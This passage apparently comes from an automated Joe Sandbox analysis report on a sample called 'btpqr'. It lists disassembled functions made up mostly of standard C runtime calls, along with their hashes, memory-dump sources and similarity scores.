                                                                                                                        • API String ID: 2005118841-3213267489
                                                                                                                        • Opcode ID: 3dccb9f08c5f50c4cab5c5c54946fbcb14d995abd92c3675e07a08fa25c03085
                                                                                                                        • Instruction ID: 5c836f8a91e7edd1b7dd0bb0fa671a8c187fbff429456b5ff1bf3ece296cfab3
                                                                                                                        • Opcode Fuzzy Hash: 3dccb9f08c5f50c4cab5c5c54946fbcb14d995abd92c3675e07a08fa25c03085
                                                                                                                        • Instruction Fuzzy Hash: 045175B46007099FD720DF19C480B9ABBF4BF08308F10842EE8469B792E7B9E905CF58
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        APIs
                                                                                                                          • Part of subcall function 00403520: std::locale::_Init.LIBCPMT ref: 00403583
                                                                                                                          • Part of subcall function 00401430: std::_Lockit::_Lockit.LIBCPMT ref: 0040143E
                                                                                                                        • std::ios_base::_Addstd.LIBCPMT ref: 0040508C
                                                                                                                          • Part of subcall function 00406F87: std::_Lockit::_Lockit.LIBCPMT ref: 00406F90
                                                                                                                        • __CxxThrowException@8.LIBCMT ref: 004050B3
                                                                                                                          • Part of subcall function 004088F0: RaiseException.KERNEL32(00000001,0042876C,)i@,?,?,?,?,?,00406929,?,004259A0,?), ref: 00408941
                                                                                                                        • __CxxThrowException@8.LIBCMT ref: 004050CB
                                                                                                                        • __CxxThrowException@8.LIBCMT ref: 004050E3
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000002.00000002.1377385430.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        • Associated: 00000002.00000002.1377371770.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                        • Associated: 00000002.00000002.1377407672.000000000041E000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                        • Associated: 00000002.00000002.1377423905.0000000000427000.00000040.00000001.01000000.00000004.sdmp
                                                                                                                        • Associated: 00000002.00000002.1377451962.0000000000429000.00000004.00000001.01000000.00000004.sdmp
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_2_2_400000_btpqr.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: Exception@8Throw$LockitLockit::_std::_$AddstdExceptionInitRaisestd::ios_base::_std::locale::_
                                                                                                                        • String ID: ios_base::badbit set$ios_base::eofbit set$ios_base::failbit set$pA
                                                                                                                        • API String ID: 762193293-980797041
                                                                                                                        • Opcode ID: fa09114c1ceab09b637f4341333f499eee84353d3a1a8a92e7b16c0a570c66ce
                                                                                                                        • Instruction ID: 59313090c745f726c54fe228dad8431c22795c02cae5c134c9d8eca5dd67d99a
                                                                                                                        • Opcode Fuzzy Hash: fa09114c1ceab09b637f4341333f499eee84353d3a1a8a92e7b16c0a570c66ce
                                                                                                                        • Instruction Fuzzy Hash: 0431E471A00609AFDB00EFA5C485B9EB7A8FF04304F50803BE941A7282DB7DE9548B99
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        APIs
                                                                                                                        • __CxxThrowException@8.LIBCMT ref: 00404405
                                                                                                                          • Part of subcall function 004088F0: RaiseException.KERNEL32(00000001,0042876C,)i@,?,?,?,?,?,00406929,?,004259A0,?), ref: 00408941
                                                                                                                        • __CxxThrowException@8.LIBCMT ref: 0040441D
                                                                                                                        • __CxxThrowException@8.LIBCMT ref: 00404435
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000002.00000002.1377385430.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        • Associated: 00000002.00000002.1377371770.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                        • Associated: 00000002.00000002.1377407672.000000000041E000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                        • Associated: 00000002.00000002.1377423905.0000000000427000.00000040.00000001.01000000.00000004.sdmp
                                                                                                                        • Associated: 00000002.00000002.1377451962.0000000000429000.00000004.00000001.01000000.00000004.sdmp
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_2_2_400000_btpqr.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: Exception@8Throw$ExceptionRaise
                                                                                                                        • String ID: <A$ios_base::badbit set$ios_base::eofbit set$ios_base::failbit set$pA
                                                                                                                        • API String ID: 3476068407-1999480123
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID: ios_base::badbit set$ios_base::eofbit set$ios_base::failbit set$pA
                                                                                                                        • API String ID: 0-980797041
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        APIs
                                                                                                                        • __CxxThrowException@8.LIBCMT ref: 004062C9
                                                                                                                        • __CxxThrowException@8.LIBCMT ref: 004062E9
                                                                                                                        • __CxxThrowException@8.LIBCMT ref: 00406304
                                                                                                                        Similarity
                                                                                                                        • API ID: Exception@8Throw
                                                                                                                        • String ID: ios_base::badbit set$ios_base::eofbit set$ios_base::failbit set$pA
                                                                                                                        • API String ID: 2005118841-980797041
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        APIs
                                                                                                                        • __CxxThrowException@8.LIBCMT ref: 0040577D
                                                                                                                        • __CxxThrowException@8.LIBCMT ref: 0040579D
                                                                                                                        • __CxxThrowException@8.LIBCMT ref: 004057B8
                                                                                                                        Similarity
                                                                                                                        • API ID: Exception@8Throw
                                                                                                                        • String ID: ios_base::badbit set$ios_base::eofbit set$ios_base::failbit set$pA
                                                                                                                        • API String ID: 2005118841-980797041
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        APIs
                                                                                                                        • __CxxThrowException@8.LIBCMT ref: 004062C9
                                                                                                                        • __CxxThrowException@8.LIBCMT ref: 004062E9
                                                                                                                        • __CxxThrowException@8.LIBCMT ref: 00406304
                                                                                                                        Similarity
                                                                                                                        • API ID: Exception@8Throw
                                                                                                                        • String ID: ios_base::badbit set$ios_base::eofbit set$ios_base::failbit set$pA
                                                                                                                        • API String ID: 2005118841-980797041
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        APIs
                                                                                                                        • __CxxThrowException@8.LIBCMT ref: 0040577D
                                                                                                                        • __CxxThrowException@8.LIBCMT ref: 0040579D
                                                                                                                        • __CxxThrowException@8.LIBCMT ref: 004057B8
                                                                                                                        Similarity
                                                                                                                        • API ID: Exception@8Throw
                                                                                                                        • String ID: ios_base::badbit set$ios_base::eofbit set$ios_base::failbit set$pA
                                                                                                                        • API String ID: 2005118841-980797041
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        APIs
                                                                                                                        • __CxxThrowException@8.LIBCMT ref: 00404355
                                                                                                                          • Part of subcall function 004088F0: RaiseException.KERNEL32(00000001,0042876C,)i@,?,?,?,?,?,00406929,?,004259A0,?), ref: 00408941
                                                                                                                        • __CxxThrowException@8.LIBCMT ref: 0040436D
                                                                                                                        • __CxxThrowException@8.LIBCMT ref: 00404385
                                                                                                                        Similarity
                                                                                                                        • API ID: Exception@8Throw$ExceptionRaise
                                                                                                                        • String ID: ios_base::badbit set$ios_base::eofbit set$ios_base::failbit set$pA
                                                                                                                        • API String ID: 3476068407-980797041
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        APIs
                                                                                                                        • __mtinitlocknum.LIBCMT ref: 0041576A
                                                                                                                          • Part of subcall function 004096DF: __FF_MSGBANNER.LIBCMT ref: 004096F4
                                                                                                                          • Part of subcall function 004096DF: __NMSG_WRITE.LIBCMT ref: 004096FB
                                                                                                                          • Part of subcall function 004096DF: __malloc_crt.LIBCMT ref: 0040971B
                                                                                                                        • __lock.LIBCMT ref: 0041577D
                                                                                                                        • __lock.LIBCMT ref: 004157C9
                                                                                                                        • InitializeCriticalSectionAndSpinCount.KERNEL32(8000000C,00000FA0,00426078,00000018,0041A47E,?,00000000,00000109), ref: 004157E5
                                                                                                                        • EnterCriticalSection.KERNEL32(8000000C,00426078,00000018,0041A47E,?,00000000,00000109), ref: 00415802
                                                                                                                        • LeaveCriticalSection.KERNEL32(8000000C), ref: 00415812
                                                                                                                        Similarity
                                                                                                                        • API ID: CriticalSection$__lock$CountEnterInitializeLeaveSpin__malloc_crt__mtinitlocknum
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 1422805418-0
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        APIs
                                                                                                                          • Part of subcall function 004101F3: __getptd_noexit.LIBCMT ref: 004101F4
                                                                                                                        • _wcscmp.LIBCMT ref: 00412442
                                                                                                                        • _wcscmp.LIBCMT ref: 00412458
                                                                                                                        • ___lc_wcstolc.LIBCMT ref: 00412484
                                                                                                                        • ___get_qualified_locale.LIBCMT ref: 004124A9
                                                                                                                          • Part of subcall function 004193BE: _TranslateName.LIBCMT ref: 004193FE
                                                                                                                          • Part of subcall function 004193BE: _GetLocaleNameFromLangCountry.LIBCMT ref: 00419417
                                                                                                                          • Part of subcall function 004193BE: _TranslateName.LIBCMT ref: 00419432
                                                                                                                          • Part of subcall function 004193BE: _GetLocaleNameFromLangCountry.LIBCMT ref: 00419448
                                                                                                                          • Part of subcall function 004193BE: IsValidCodePage.KERNEL32(00000000,?,?,00000055,?,?,004124AE,?,?,?,?,00000004,?,00000000), ref: 0041949C
                                                                                                                        • GetACP.KERNEL32(?,?,?,?,?,00000004,?,00000000), ref: 00412540
                                                                                                                        • _memmove.LIBCMT ref: 004125F6
                                                                                                                        • __invoke_watson.LIBCMT ref: 0041264B
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000002.00000002.1377385430.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        • Associated: 00000002.00000002.1377371770.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                        • Associated: 00000002.00000002.1377407672.000000000041E000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                        • Associated: 00000002.00000002.1377423905.0000000000427000.00000040.00000001.01000000.00000004.sdmp
                                                                                                                        • Associated: 00000002.00000002.1377451962.0000000000429000.00000004.00000001.01000000.00000004.sdmp
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_2_2_400000_btpqr.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: Name$CountryFromLangLocaleTranslate_wcscmp$CodePageValid___get_qualified_locale___lc_wcstolc__getptd_noexit__invoke_watson_memmove
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 90596148-0
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        APIs
                                                                                                                        • ___createFile.LIBCMT ref: 0041A507
                                                                                                                          • Part of subcall function 0041A1EA: GetModuleHandleW.KERNEL32(kernel32.dll,CreateFile2,00000001,0000000C,00000001,?,?,?,00000000,00000109), ref: 0041A204
                                                                                                                          • Part of subcall function 0041A1EA: GetProcAddress.KERNEL32(00000000), ref: 0041A20B
                                                                                                                        • GetLastError.KERNEL32 ref: 0041A530
                                                                                                                        • __dosmaperr.LIBCMT ref: 0041A537
                                                                                                                        • GetFileType.KERNEL32(00000000,?,?,?,?,?,00000000,00000109), ref: 0041A54A
                                                                                                                        • GetLastError.KERNEL32 ref: 0041A56D
                                                                                                                        • __dosmaperr.LIBCMT ref: 0041A576
                                                                                                                        • CloseHandle.KERNEL32(?), ref: 0041A57F
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000002.00000002.1377385430.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        • Associated: 00000002.00000002.1377371770.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                        • Associated: 00000002.00000002.1377407672.000000000041E000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                        • Associated: 00000002.00000002.1377423905.0000000000427000.00000040.00000001.01000000.00000004.sdmp
                                                                                                                        • Associated: 00000002.00000002.1377451962.0000000000429000.00000004.00000001.01000000.00000004.sdmp
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_2_2_400000_btpqr.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: ErrorFileHandleLast__dosmaperr$AddressCloseModuleProcType___create
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 2958604131-0
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        APIs
                                                                                                                        • std::_Locinfo::_Locinfo_dtor.LIBCPMT ref: 00401DE4
                                                                                                                          • Part of subcall function 00406E89: _setlocale.LIBCMT ref: 00406E9A
                                                                                                                        • _free.LIBCMT ref: 00401DF4
                                                                                                                          • Part of subcall function 00407AE6: HeapFree.KERNEL32(00000000,00000000,?,0041026B,00000000,00000001,00000000,?,?,?,004087B6,00406914,00000000), ref: 00407AFA
                                                                                                                          • Part of subcall function 00407AE6: GetLastError.KERNEL32(00000000,?,0041026B,00000000,00000001,00000000,?,?,?,004087B6,00406914,00000000), ref: 00407B0C
                                                                                                                        • _free.LIBCMT ref: 00401E0B
                                                                                                                        • _free.LIBCMT ref: 00401E22
                                                                                                                        • _free.LIBCMT ref: 00401E39
                                                                                                                        • _free.LIBCMT ref: 00401E50
                                                                                                                        • _free.LIBCMT ref: 00401E67
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000002.00000002.1377385430.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        • Associated: 00000002.00000002.1377371770.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                        • Associated: 00000002.00000002.1377407672.000000000041E000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                        • Associated: 00000002.00000002.1377423905.0000000000427000.00000040.00000001.01000000.00000004.sdmp
                                                                                                                        • Associated: 00000002.00000002.1377451962.0000000000429000.00000004.00000001.01000000.00000004.sdmp
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_2_2_400000_btpqr.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: _free$ErrorFreeHeapLastLocinfo::_Locinfo_dtor_setlocalestd::_
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 3515823920-0
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        APIs
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000002.00000002.1377385430.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        • Associated: 00000002.00000002.1377371770.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                        • Associated: 00000002.00000002.1377407672.000000000041E000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                        • Associated: 00000002.00000002.1377423905.0000000000427000.00000040.00000001.01000000.00000004.sdmp
                                                                                                                        • Associated: 00000002.00000002.1377451962.0000000000429000.00000004.00000001.01000000.00000004.sdmp
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_2_2_400000_btpqr.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: _strcspn$_localeconv
                                                                                                                        • String ID: @A$DA
                                                                                                                        • API String ID: 3678913754-1653914641
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        APIs
                                                                                                                        • __init_pointers.LIBCMT ref: 0041032D
                                                                                                                          • Part of subcall function 0040DDD0: EncodePointer.KERNEL32(00000000,?,00410332,00409544,00425B90,00000014), ref: 0040DDD3
                                                                                                                          • Part of subcall function 0040DDD0: __initp_misc_winsig.LIBCMT ref: 0040DDF4
                                                                                                                        • __mtinitlocks.LIBCMT ref: 00410332
                                                                                                                          • Part of subcall function 00409786: InitializeCriticalSectionAndSpinCount.KERNEL32(004290E0,00000FA0,?,?,00410337,00409544,00425B90,00000014), ref: 004097A4
                                                                                                                        • __mtterm.LIBCMT ref: 0041033B
                                                                                                                        • __calloc_crt.LIBCMT ref: 00410360
                                                                                                                        • GetCurrentThreadId.KERNEL32 ref: 00410389
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000002.00000002.1377385430.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        • Associated: 00000002.00000002.1377371770.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                        • Associated: 00000002.00000002.1377407672.000000000041E000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                        • Associated: 00000002.00000002.1377423905.0000000000427000.00000040.00000001.01000000.00000004.sdmp
                                                                                                                        • Associated: 00000002.00000002.1377451962.0000000000429000.00000004.00000001.01000000.00000004.sdmp
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_2_2_400000_btpqr.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: CountCriticalCurrentEncodeInitializePointerSectionSpinThread__calloc_crt__init_pointers__initp_misc_winsig__mtinitlocks__mtterm
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 1171689812-0
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        APIs
                                                                                                                        • ____lc_codepage_func.LIBCMT ref: 0040695C
                                                                                                                        • __calloc_crt.LIBCMT ref: 0040696D
                                                                                                                          • Part of subcall function 0040AF53: __calloc_impl.LIBCMT ref: 0040AF62
                                                                                                                          • Part of subcall function 0040AF53: Sleep.KERNEL32(00000000), ref: 0040AF79
                                                                                                                        • ___pctype_func.LIBCMT ref: 00406980
                                                                                                                        • _memmove.LIBCMT ref: 00406989
                                                                                                                        • ___pctype_func.LIBCMT ref: 0040699A
                                                                                                                        • ____lc_locale_name_func.LIBCMT ref: 004069A6
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000002.00000002.1377385430.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        • Associated: 00000002.00000002.1377371770.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                        • Associated: 00000002.00000002.1377407672.000000000041E000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                        • Associated: 00000002.00000002.1377423905.0000000000427000.00000040.00000001.01000000.00000004.sdmp
                                                                                                                        • Associated: 00000002.00000002.1377451962.0000000000429000.00000004.00000001.01000000.00000004.sdmp
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_2_2_400000_btpqr.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: ___pctype_func$Sleep____lc_codepage_func____lc_locale_name_func__calloc_crt__calloc_impl_memmove
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 284940700-0
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        APIs
                                                                                                                        • std::ios_base::_Ios_base_dtor.LIBCPMT ref: 00402871
                                                                                                                          • Part of subcall function 00405650: __CxxThrowException@8.LIBCMT ref: 0040577D
                                                                                                                          • Part of subcall function 00405650: __CxxThrowException@8.LIBCMT ref: 0040579D
                                                                                                                          • Part of subcall function 00405650: __CxxThrowException@8.LIBCMT ref: 004057B8
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000002.00000002.1377385430.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        • Associated: 00000002.00000002.1377371770.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                        • Associated: 00000002.00000002.1377407672.000000000041E000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                        • Associated: 00000002.00000002.1377423905.0000000000427000.00000040.00000001.01000000.00000004.sdmp
                                                                                                                        • Associated: 00000002.00000002.1377451962.0000000000429000.00000004.00000001.01000000.00000004.sdmp
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_2_2_400000_btpqr.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: Exception@8Throw$Ios_base_dtorstd::ios_base::_
                                                                                                                        • String ID: 8A$LA$qerrrttt.$A
                                                                                                                        • API String ID: 2823994529-1914960203
                                                                                                                        • Opcode ID: 659c7c9a071d372c7fae5c01efb59a60aef7c333844c7f5ee801fe6ab0b2112e
                                                                                                                        • Instruction ID: fb1bf560d20b8678f62f7ecc038f84b4bf07cae56b60ca27a0f9219637644c70
                                                                                                                        • Opcode Fuzzy Hash: 659c7c9a071d372c7fae5c01efb59a60aef7c333844c7f5ee801fe6ab0b2112e
                                                                                                                        • Instruction Fuzzy Hash: E6317E34700318AFDB10DF55C846F9AB7A4AF05304F1080AAF94D6B2D1DB74AD89CF46
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        APIs
                                                                                                                          • Part of subcall function 004101F3: __getptd_noexit.LIBCMT ref: 004101F4
                                                                                                                        • __lock.LIBCMT ref: 00411C28
                                                                                                                        • InterlockedDecrement.KERNEL32(?), ref: 00411C45
                                                                                                                        • _free.LIBCMT ref: 00411C58
                                                                                                                        • InterlockedIncrement.KERNEL32(00713A30), ref: 00411C70
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000002.00000002.1377385430.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        • Associated: 00000002.00000002.1377371770.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                        • Associated: 00000002.00000002.1377407672.000000000041E000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                        • Associated: 00000002.00000002.1377423905.0000000000427000.00000040.00000001.01000000.00000004.sdmp
                                                                                                                        • Associated: 00000002.00000002.1377451962.0000000000429000.00000004.00000001.01000000.00000004.sdmp
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_2_2_400000_btpqr.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: Interlocked$DecrementIncrement__getptd_noexit__lock_free
                                                                                                                        • String ID: 0:q
                                                                                                                        • API String ID: 2704283638-3649151825
                                                                                                                        • Opcode ID: 4397255d2cf064546504a68f027dc8adbe81c32d77eb9da381f824ad1c66c018
                                                                                                                        • Instruction ID: f417f7b3b40876b8226a6af1e134936137c4e2e9f048e4b48827e7bfe984e31f
                                                                                                                        • Opcode Fuzzy Hash: 4397255d2cf064546504a68f027dc8adbe81c32d77eb9da381f824ad1c66c018
                                                                                                                        • Instruction Fuzzy Hash: 85018E31B816219BDB20AB6699057DAB7606B00720F00802BEA01673A0D77C5DC2CFDD
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        APIs
                                                                                                                          • Part of subcall function 004101F3: __getptd_noexit.LIBCMT ref: 004101F4
                                                                                                                        • __invoke_watson.LIBCMT ref: 004191BC
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000002.00000002.1377385430.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        • Associated: 00000002.00000002.1377371770.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                        • Associated: 00000002.00000002.1377407672.000000000041E000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                        • Associated: 00000002.00000002.1377423905.0000000000427000.00000040.00000001.01000000.00000004.sdmp
                                                                                                                        • Associated: 00000002.00000002.1377451962.0000000000429000.00000004.00000001.01000000.00000004.sdmp
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_2_2_400000_btpqr.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: __getptd_noexit__invoke_watson
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 2533157543-0
                                                                                                                        • Opcode ID: b911992bd99b12d8214eb4bfbd25c0cc307b59397655b3af73b164bd50a0f188
                                                                                                                        • Instruction ID: 39977fd7417bf924d26e73d05843b8b38d4593138b017d0d2770cc730a86a45a
                                                                                                                        • Opcode Fuzzy Hash: b911992bd99b12d8214eb4bfbd25c0cc307b59397655b3af73b164bd50a0f188
                                                                                                                        • Instruction Fuzzy Hash: 7071E471900611AAEF14AA25CC96FFB77ACEF04304F1440AEFD05DA186EB3CDDC58A69
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        APIs
                                                                                                                        • std::_Lockit::_Lockit.LIBCPMT ref: 00401B7B
                                                                                                                          • Part of subcall function 0040677D: __lock.LIBCMT ref: 0040678E
                                                                                                                        • std::_Locinfo::_Locinfo_ctor.LIBCPMT ref: 00401BBF
                                                                                                                          • Part of subcall function 00406E3E: _setlocale.LIBCMT ref: 00406E45
                                                                                                                          • Part of subcall function 00406E3E: _Yarn.LIBCPMT ref: 00406E5D
                                                                                                                          • Part of subcall function 00406E3E: _setlocale.LIBCMT ref: 00406E6D
                                                                                                                          • Part of subcall function 00406E3E: _Yarn.LIBCPMT ref: 00406E81
                                                                                                                        • std::exception::exception.LIBCMT ref: 00401BDE
                                                                                                                        • __CxxThrowException@8.LIBCMT ref: 00401BF3
                                                                                                                        • std::exception::exception.LIBCMT ref: 00401C0B
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000002.00000002.1377385430.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        • Associated: 00000002.00000002.1377371770.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                        • Associated: 00000002.00000002.1377407672.000000000041E000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                        • Associated: 00000002.00000002.1377423905.0000000000427000.00000040.00000001.01000000.00000004.sdmp
                                                                                                                        • Associated: 00000002.00000002.1377451962.0000000000429000.00000004.00000001.01000000.00000004.sdmp
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_2_2_400000_btpqr.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: Yarn_setlocalestd::_std::exception::exception$Exception@8Locinfo::_Locinfo_ctorLockitLockit::_Throw__lock
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 41705312-0
                                                                                                                        • Opcode ID: b83beae6e0564732d37f664b7eee04f3d0f98736a540e1fe836c82fb725a70ae
                                                                                                                        • Instruction ID: 7b12f2ed1f03a6797e13c7d7b9b19440d1379a92b4c9802516e35934317e0049
                                                                                                                        • Opcode Fuzzy Hash: b83beae6e0564732d37f664b7eee04f3d0f98736a540e1fe836c82fb725a70ae
                                                                                                                        • Instruction Fuzzy Hash: EC215E75500708AFC320DF6AC841B87BBF8AF15310F00892FE999D7A41E774E5188BE9
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        APIs
                                                                                                                        • _malloc.LIBCMT ref: 004131A8
                                                                                                                          • Part of subcall function 0040B126: __FF_MSGBANNER.LIBCMT ref: 0040B13D
                                                                                                                          • Part of subcall function 0040B126: __NMSG_WRITE.LIBCMT ref: 0040B144
                                                                                                                          • Part of subcall function 0040B126: RtlAllocateHeap.NTDLL(00700000,00000000,00000001,00000001,?,?,?,0040887C,00000001,00000000,?,?,?,004087B6,00406914,00000000), ref: 0040B169
                                                                                                                        • _free.LIBCMT ref: 004131BB
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000002.00000002.1377385430.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        • Associated: 00000002.00000002.1377371770.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                        • Associated: 00000002.00000002.1377407672.000000000041E000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                        • Associated: 00000002.00000002.1377423905.0000000000427000.00000040.00000001.01000000.00000004.sdmp
                                                                                                                        • Associated: 00000002.00000002.1377451962.0000000000429000.00000004.00000001.01000000.00000004.sdmp
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_2_2_400000_btpqr.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: AllocateHeap_free_malloc
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 1020059152-0
                                                                                                                        • Opcode ID: 007cb4591f99264318f26c37b9be09d21f13ef93252a8db8c5834184a756d67a
                                                                                                                        • Instruction ID: 78d9daa3a18d7c51f74a6bc9e1583db6add2ba5685b8f88f4b86c3d041058c6b
                                                                                                                        • Opcode Fuzzy Hash: 007cb4591f99264318f26c37b9be09d21f13ef93252a8db8c5834184a756d67a
                                                                                                                        • Instruction Fuzzy Hash: FF11C431904211BBCB303F71AC44ADB3B94EB05765B10447BFC14A62A1DB3D8E81869D
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        APIs
                                                                                                                        • _localeconv.LIBCMT ref: 00403436
                                                                                                                        • __Getcvt.LIBCPMT ref: 00403441
                                                                                                                          • Part of subcall function 00406AC1: ____lc_codepage_func.LIBCMT ref: 00406AD8
                                                                                                                          • Part of subcall function 00406AC1: ____mb_cur_max_func.LIBCMT ref: 00406AE1
                                                                                                                          • Part of subcall function 00406AC1: ____lc_locale_name_func.LIBCMT ref: 00406AE9
                                                                                                                        Strings
